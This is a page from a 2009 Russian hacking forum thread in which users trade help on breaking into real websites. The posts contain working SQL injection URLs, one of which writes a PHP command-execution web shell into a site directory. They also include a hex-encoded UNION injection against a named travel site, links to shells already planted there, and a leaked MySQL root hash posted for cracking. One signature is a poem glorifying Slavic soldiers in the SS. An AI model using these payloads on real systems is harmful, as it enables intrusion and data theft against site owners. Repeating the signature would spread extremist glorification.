ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10491  
Старый 01.12.2009, 15:13
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
кавычки экранируются. Да и file_priv=n помоему. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4
спс, а сам запрос верно написал?
 
Ответить с цитированием

  #10492  
Старый 01.12.2009, 15:20
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

что можно с этим сделать?
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
 
Ответить с цитированием

  #10493  
Старый 01.12.2009, 15:21
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от Totgeliebt  
что можно с этим сделать?
Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 3699224 bytes) in /home/gamer/public_html/messages.php on line 411
Ну теперь ты знаеш полный путь.
А это переполнение разрешенной памяти вроде
 
Ответить с цитированием

  #10494  
Старый 01.12.2009, 15:21
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от Pashkela  
регить сайт на народе - 1 мин.
на народе помоему капчу ввели для скачивания.
 
Ответить с цитированием

  #10495  
Старый 01.12.2009, 15:28
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

Цитата:
Сообщение от m0Hze  
Ну теперь ты знаеш полный путь.
А это переполнение разрешенной памяти вроде
а для чего это может пригодится?
 
Ответить с цитированием

  #10496  
Старый 01.12.2009, 15:33
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от Totgeliebt  
а для чего это может пригодится?
Полный путь,например для заливки шела через sql-inj.
 
Ответить с цитированием

  #10497  
Старый 01.12.2009, 16:10
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от l1ght  
скуля, это конечно хорошо, но не запароленный пма под рутом гораздо юзабильнее
(без пробелов)
terratour.ru/ru/shell.system.eval.select.backconnect.root.hacker.e xploit.findme.download.free.porn.c99.wso2.2009.JpG .pHp
Спасибо, если можно разъясните что такое пма, или ссылку дайте.
 
Ответить с цитированием

  #10498  
Старый 01.12.2009, 16:17
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

root@localhost

file_priv Y

into outfile & load_file рабаотает...
но когда даю такой запрос пишет:

Ошибка в параметрах запроса

http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*

но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально....

может отсутствуют права на запись в директорию сайта?
 
Ответить с цитированием

  #10499  
Старый 01.12.2009, 16:23
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от l1ght  
скуля, это конечно хорошо, но не запароленный пма под рутом гораздо юзабильнее
http://terratour.ru/ru/turkhackteam.php
а ну эти линки на шеллы, через 5-30 секунд умирают)
я не вкурил какие линки на шеллы? О_о у меня до сих пор все живое))уже как 1 час гдето

PSSSS самое прикольное что там RFI\LFI по сути))))тока там отключенно удаленное(забыл как она называется, сбудуна просто сижу, экз сдал )

в 3.4.6 колонках если 0xhex вставить то инклудь что хочеш на нем, тока есть косяка / поэтому в 3 колонке hex путей а в 4 уже hex файла ))

http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,0x443a5c7777775c7275,0x70616765 732e706870,5,6
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

Последний раз редактировалось HAXTA4OK; 01.12.2009 в 16:28..
 
Ответить с цитированием

  #10500  
Старый 01.12.2009, 16:26
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от 547  
root@localhost

file_priv Y

into outfile & load_file рабаотает...
но когда даю такой запрос пишет:

Ошибка в параметрах запроса

http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*

но какая тут ошибка? путь найшол вроде все правильно в tmp записывалось нормально....

может отсутствуют права на запись в директорию сайта?
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
уматно сайт спрятал =))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ